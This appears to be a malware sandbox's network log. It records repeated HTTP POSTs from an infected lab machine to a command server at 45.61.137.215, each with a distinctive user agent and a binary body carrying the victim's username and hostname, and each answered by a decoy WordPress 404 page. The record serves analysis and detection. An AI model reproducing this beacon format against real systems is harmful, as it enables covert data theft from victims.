                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:46:04.481019974 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:46:04.481059074 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:46:04.481091022 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:46:04.481126070 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:46:04.481158018 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:46:04.481193066 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                                            Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                                            May 29, 2024 15:46:04.481221914 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                                            Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                                            May 29, 2024 15:46:04.481255054 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:46:04.481290102 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            90192.168.2.94980645.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:46:04.642667055 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:46:04.647743940 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:46:07.301341057 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:46:05 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:46:07.301405907 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:46:07.301441908 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:46:07.301475048 CEST672INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:46:07.301511049 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                                            Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                                            May 29, 2024 15:46:07.301541090 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                            Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                                            May 29, 2024 15:46:07.301575899 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:46:07.301609993 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:46:07.301645041 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:46:07.301678896 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            91192.168.2.94980745.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:46:07.455147982 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:46:07.460093975 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:46:09.901803017 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:46:07 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:46:09.901832104 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:46:09.901854992 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:46:09.901868105 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:46:09.901983023 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:46:09.902167082 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:46:09.902239084 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:46:09.902251959 CEST1236INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:46:09.902282953 CEST1236INData Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b
                                            Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important
                                            May 29, 2024 15:46:09.902307987 CEST896INData Raw: 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79
                                            Data Ascii: ack-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--w


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            92192.168.2.94980845.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:46:10.058300018 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:46:10.063270092 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:46:12.658502102 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:46:10 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
